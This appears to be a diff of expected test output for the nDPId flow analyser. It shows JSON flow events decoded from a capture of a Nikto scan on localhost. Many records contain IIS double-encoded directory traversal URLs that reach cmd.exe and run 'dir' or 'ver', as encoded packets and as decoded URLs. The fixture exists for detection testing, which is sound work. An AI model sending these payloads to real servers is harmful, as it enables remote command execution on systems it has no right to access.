 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"ts_msec":1576420277893,"pkt":"AAAAAAAAAAAAAAAACABFAADvSZpAAEAG8mx\/AAABfwAAAcdqH5B\/BnDaXNCp24AYAED+4wAAAQEICp1m\/62dZv+tR0VUIC9jZ2ktYmluLy4uJTI1NWMuLiUyNTVjLi4lMjU1Y3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk1KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}}
+01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}}
+01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}}
+01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}}
+01102{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}}
+01090{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}}
+01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}}
+01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00752{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}}
